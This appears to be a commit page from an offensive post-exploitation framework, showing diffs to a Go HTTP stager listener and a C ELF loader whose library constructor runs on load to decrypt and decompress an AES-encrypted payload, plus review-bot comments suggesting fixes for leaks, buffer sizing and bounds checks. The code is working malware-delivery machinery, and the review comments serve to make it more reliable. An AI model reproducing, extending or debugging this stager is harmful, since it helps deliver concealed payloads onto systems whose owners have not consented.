feat: support payload compression in stager
jm33-m0 committed Dec 26, 2024
1 parent 6f33bb0 commit 97b271a
Showing 2 changed files with 21 additions and 8 deletions.
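--- a/core/cmd/listener/http_stager.go
+++ b/core/cmd/listener/http_stager.go
@@ -2,7 +2,7 @@ package main
 
 import (
 "bytes"
-"compress/zlib"
+"compress/flate"
 "crypto/aes"
 "crypto/cipher"
 "crypto/rand"
@@ -43,11 +43,14 @@ func encryptData(data []byte, key []byte) []byte {
 return append(iv, encrypted...)
 }
 
-// compressData compresses the given data using zlib.
+// compressData compresses the given data using raw deflate.
 func compressData(data []byte) []byte {
 var b bytes.Buffer
-w := zlib.NewWriter(&b)
-_, err := w.Write(data)
+w, err := flate.NewWriter(&b, flate.BestCompression)
+if err != nil {
+log.Fatalf("Failed to create deflate writer: %v", err)
+}
+_, err = w.Write(data)
 if err != nil {
 log.Fatalf("Failed to compress data: %v", err)
 }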
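Review bot: The doc comment on `compressData` should spell out what the format change means for anything that reads this output: it is now a headerless DEFLATE stream (RFC 1951), so the zlib header and the Adler-32 trailer are gone and the container no longer carries a checksum over the decompressed bytes. Suggested wording: `// compressData returns data as a raw DEFLATE stream (RFC 1951); unlike zlib there is no header or Adler-32 trailer, so integrity must be checked elsewhere.` The new `flate.NewWriter` error branch can only trigger for an invalid compression level, which the constant `flate.BestCompression` is not, so it is effectively dead code and could carry a comment saying so. The function continues past the end of the hunk, so whether the writer is closed before the buffer is read cannot be confirmed from here.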
18 changes: 14 additions & 4 deletions loader/elf/stager.c
Expand Up @@ -241,6 +241,15 @@ void __attribute__((constructor)) initLibrary(void) {
DEBUG_PRINT("Encrypted data size: %zu\n", data_size - 16);
size_t decrypted_size = decrypt_data(buf + 16, data_size - 16, key, iv);

// copy the decrypted data to a new buffer
char *decrypted_data = calloc(decrypted_size, sizeof(char));
if (!decrypted_data) {
perror("malloc");
free(buf);
return;
}
memcpy(decrypted_data, buf + 16, decrypted_size);

#ifdef DEBUG
// Save the decrypted data to disk
FILE *file = fopen("/tmp/decrypted_data", "wb");
Expand All @@ -254,16 +263,17 @@ void __attribute__((constructor)) initLibrary(void) {
#endif

// Decompress the decrypted data
unsigned int decompressed_size = BUFFER_SIZE * 10; // Adjust as needed
char *decompressed_buffer = malloc(decompressed_size);
unsigned int decompressed_size = decrypted_size * 10; // Adjust as needed
char *decompressed_buffer = calloc(decompressed_size, sizeof(char));
if (!decompressed_buffer) {
perror("malloc");
free(buf);
return;
}
DEBUG_PRINT("Allocated decompressed buffer of size: %u\n", decompressed_size);

int res = tinf_zlib_uncompress(decompressed_buffer, &decompressed_size,
buf + 16, decrypted_size);
int res = tinf_uncompress(decompressed_buffer, &decompressed_size,
decrypted_data, decrypted_size);
free(buf);
if (res != TINF_OK) {
fprintf(stderr, "Decompression failed: %d\n", res);
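Review bot: `decrypted_data` is never released in the visible lines: when the `calloc` for `decompressed_buffer` fails the error path frees only `buf`, and after `tinf_uncompress` only `buf` is freed as well, so `free(decrypted_data);` should sit next to both `free(buf);` calls. The sizing line `unsigned int decompressed_size = decrypted_size * 10;` narrows a `size_t` product to `unsigned int` and assumes a ratio of at most 10:1, which deflate at its best-compression level can exceed on repetitive input, so decompression would then fail for lack of output space. The `memcpy` also trusts the value returned by `decrypt_data` without comparing it to `data_size - 16`; a guard such as `if (decrypted_size == 0 || decrypted_size > data_size - 16) { free(buf); return; }` before the first `calloc` would cover both the zero-size allocation and an over-read of `buf`. `initLibrary` starts and ends outside these hunks, so a later free or check may exist that is not shown.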
